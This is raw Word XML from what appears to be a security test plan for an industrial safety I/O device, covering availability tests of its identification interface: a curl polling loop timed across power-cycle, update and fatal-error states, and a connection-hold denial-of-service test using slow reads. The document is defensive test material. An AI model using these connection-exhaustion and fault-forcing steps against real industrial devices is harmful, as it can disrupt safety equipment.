          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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4FD096EF" w14:textId="2E364E13" w:rsidR="0069129D" w:rsidRPr="006D5B99"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inherent unavailability (design/reliability)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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4690B306" w14:textId="745DF375" w:rsidR="0069129D" w:rsidRPr="006D5B99"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9129D" w:rsidRPr="006D5B99"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164CF51F" w14:textId="6A21E963" w:rsidR="0069129D" w:rsidRPr="006D5B99"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identification data is not available "at all times" by continuously polling while the device transitions through </w:t>
            </w:r>
            <w:r w:rsidR="00AB1017" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>initialization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (power-cycle), update (including the install restart), and fatal-error safe-state, and by identifying the safety-CPU-flash window in which safety-sourced identifiers vanish.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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3DB9086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Start a timestamped polling loop against one gateway-sourced and one safety-sourced identifier.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8385E4" w14:textId="494001D0"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Power-cycle the device (</w:t>
            </w:r>
            <w:r w:rsidR="00AB1017" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>initialization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> window).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B48A6B"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Enter the update state and trigger the install restart.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272EF7D3" w14:textId="77777777" w:rsidR="00E42677"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Force the fatal-error safe-state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F8EBCB" w14:textId="4FE62208" w:rsidR="0069129D" w:rsidRPr="006D5B99"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every interval where the request fails or the safety-sourced value is absent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FA96849" w14:textId="24092F4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A4135C" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333D45CC" w14:textId="36A84FAE" w:rsidR="00E42677"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measurable outage windows during </w:t>
            </w:r>
            <w:r w:rsidR="00AB1017" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>initialization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, install-restart, and fatal-error; and unavailability of safety-sourced identifiers during the flash window </w:t>
            </w:r>
            <w:r w:rsidR="00897C26" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the "at all times" gap </w:t>
            </w:r>
            <w:r w:rsidR="00897C26" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B2BA2D" w14:textId="3112A47E" w:rsidR="0069129D" w:rsidRPr="006D5B99"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that clause. Continuous availability through all states would refute the gap (investigate).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A13FFF" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C20D32E" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="0069129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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60EE82C9"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49F9240E" w14:textId="5221BE1A" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="00452CC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TC-RQ007-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240374" w:rsidRPr="006D5B99"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240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="00240374">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2402772D" w14:textId="594F81D7"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Kali polls continuously; TIA laptop </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240374" w:rsidRPr="006D5B99"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240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="00240374">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EAE609" w14:textId="03E229E6"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curl in a polling loop, TIA Online &amp; Diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240374" w:rsidRPr="006D5B99"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240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="00240374">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E83FF01"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8DAA2E7" w14:textId="32D9F362"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Start the polling loop in one terminal </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A8627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while true; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24D6545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"$(date +%s) $(curl -s -o /dev/null -w '%{http_code}' --max-time 1 http://$SRIO/deviceinfo/swrevision/getdata)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D6D35D0"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sleep 0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B6419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 | tee cm_rq007-02_poll.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FFB75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282A65E5" w14:textId="7A113CB3"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In a second terminal / on the TIA laptop, trigger state transitions </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D93C67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 Init window: power-cycle the SRIO (disconnect/reconnect power cable)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293115D3" w14:textId="0D1185E0" w:rsidR="00240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="00DE2FC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b) Update window: rotary switch to 999 + power cycle </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1F16CB"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firmware only, see risk note in TC-RQ005-03), then exit update (power</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BA4D1A"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cycle again)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="502CB2BD"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 FatalError: short-circuit an F-DI test pin briefly (as in TC-RQ003-04)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD1E3C3"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or another documented EC1-triggering condition</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="581B8748" w14:textId="77777777"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p>
          <w:p w14:paraId="3321AE06" w14:textId="25919DF5" w:rsidR="00240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="002403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w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> After the run, extract all failing/timed-out intervals </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F516D32" w14:textId="2E1DDFFE" w:rsidR="00240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="00240374">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t>grep -v ' 200$' cm_rq007-02_poll.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240374" w:rsidRPr="006D5B99"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3CC38B2D" w:rsidR="00240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="00240374">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F1492B" w14:textId="1DF7C3E4" w:rsidR="00240374" w:rsidRPr="006D5B99" w:rsidRDefault="00240374" w:rsidP="0024037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measurable outage windows during Init/update-restart/FatalError </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the “not available at all times” finding (G-1 in RQ-007).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="208B8408" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15347CDB" w14:textId="77777777" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAC17DC" w14:textId="6B6A308F" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="00DF084F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ007-03 -  Connection-Hold Self-DoS on the Identification </w:t>
      </w:r>
      <w:r w:rsidR="00A30A24" w:rsidRPr="00B924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA60EF" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="0069129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6D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA51C90"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18270B4C" w14:textId="792A31EE" w:rsidR="0069129D" w:rsidRPr="006D5B99"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RQ-007 </w:t>
            </w:r>
            <w:r w:rsidR="00A30A24" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.1 / CR 7.2 </w:t>
            </w:r>
            <w:r w:rsidR="00A30A24" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6749BC" w14:textId="3D98306B" w:rsidR="0069129D" w:rsidRPr="006D5B99"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 (self-inflicted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFF9B08" w14:textId="04C37C3F" w:rsidR="0069129D" w:rsidRPr="006D5B99"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69129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B4C06E" w14:textId="222124CD" w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21417BD9"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 normal operating state, open and hold the maximum number of permitted connections (no completion / slow read).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683903C7"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additional client, attempt a legitimate identification read.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E52E23A" w14:textId="77777777" w:rsidR="00A607E4"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Measure whether the additional request is refused or times out.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6860DEA2" w14:textId="7CBDAB5A" w:rsidR="0069129D" w:rsidRPr="006D5B99"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Release one held connection; confirm access is restored.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA0D7EA" w14:textId="6187EF84" w:rsidR="000D4389"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legitimate additional read still </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">succeeds while the maximum connections are held. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06CEBBE3" w14:textId="7CE29CAD" w:rsidR="0069129D" w:rsidRPr="006D5B99"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additional request is blocked, and access returns only after release </w:t>
            </w:r>
            <w:r w:rsidR="0074487A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the self-inflicted availability failure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66770B72" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFF0D1F" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="0069129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6D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB50604" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="006D5B99"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9129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF6FAED" w14:textId="382D6E32" w:rsidR="0069129D" w:rsidRPr="006D5B99"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TC-RQ007-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E100B3A" w14:textId="7FAEA940" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="00A45F08"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69129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C8736FE" w14:textId="0BAA6AA4" w:rsidR="0069129D" w:rsidRPr="006D5B99"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w:t>
            </w:r>
            <w:r w:rsidR="00A45F08" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="533C4F27"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export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB572DE"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LOGDIR=~/rq007-03_evidence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B04977A"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mkdir -p $LOGDIR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A33DB37"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cd $LOGDIR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426DBA27"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68B3699" w14:textId="3E6ACAD1"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 Baseline: Connection working normally" | tee cm_rq007-03_00_baseline.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25BA498D"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time curl -s --max-time 5 http://$SRIO/deviceinfo/swrevision/getdata ) &gt;&gt; cm_rq007-03_00_baseline.txt 2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A46203"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cat cm_rq007-03_00_baseline.txt</w:t>
            </w:r>
          </w:p>
